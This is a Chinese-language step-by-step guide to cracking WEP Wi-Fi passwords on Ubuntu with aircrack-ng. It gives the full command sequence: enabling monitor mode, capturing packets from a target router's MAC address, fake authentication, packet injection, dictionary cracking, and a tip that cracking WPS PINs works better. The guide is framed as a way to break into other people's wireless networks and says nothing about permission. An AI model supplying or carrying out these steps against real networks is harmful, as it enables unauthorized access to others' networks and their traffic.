1.破解wifi咱们需要什么
(1).一台装有ubuntu的电脑
(2). aircrack-ng
(3).密码字典(这将决定你是否可以跑出密码!)
2.破解的步骤
(1).ubuntu下安装aircrack-ng
打开终端,确保有网络的情况下,输入sudo apt-get install aircrack-ng
(2).启动无线网卡的监控模式
打开终端,sudo airmon-ng start wlan0(wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看)
(3).查看无线AP
在终端输入sudo airodump-ng mon0(特别说明:启动监控模式后无线网的端口现在是 mon0 !!!)
看看有哪些采用wep加密的AP在线,然后按 ctrl+c 退出,保留终端
(4).抓包
另开一个终端,输入:sudo airodump-ng -c 6 --bssid 11:22:33:44:55:66 -w wep mon0(-c 后面跟着的6是要破解的路由器的工作频道,--bissid后面跟着的11:22:33:44:55:66是欲破解无线路由的MAC地址,-w后面跟着的是抓下来的数据包的文件名,在步骤2可以查看正在工作的无线路由的频道和MAC地址,保存的文件名可随便命名)
(5).与AP建立虚拟链接
再另开一个终端,输入:sudo aireplay-ng -1 0 -a 11:22:33:44:55:66 -h aa:bb:cc:dd:ee:ff --ignore-negative-one mon0(-h后面跟着的aa:bb:cc:dd:ee:ff是自己的无线网卡的MAC地址,命令:ifconfig可查看自己的MAC地址)
(6).进行注入
成功建立虚拟连接后输入:sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 11:22:33:44:55:66 -h aa:bb:cc:dd:ee:ff mon0现在回头看下步骤3的终端是不是DATA在开始飞涨!
(7).跑包
另开一个终端,输入:sudo aircrack-ng wep*.cap,进行解密。注意这里命令的文件名要和步骤4一致。若是出现了需要字典提示则输入:sudo aircrack-ng wep-01.cap -w 1.txt
(8).收工
破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的无线路由进行注入
3.注意
1.注意aircrack-ng里不带字典,需要将bt6里的字典或者自己生成的字典放到ubuntu的主文件夹中格式为xxx.txt
2.如果在步骤4的情况下Data栏始终显示的是0,可以尝试先断开所有的无线连接,然后再连接目的无线,在密码栏上随意填,确定之后就可以发现Data下有数据显示
3.密码字典的话推荐超级木头字典,但是注意,跑pin码永远比跑密码要好很多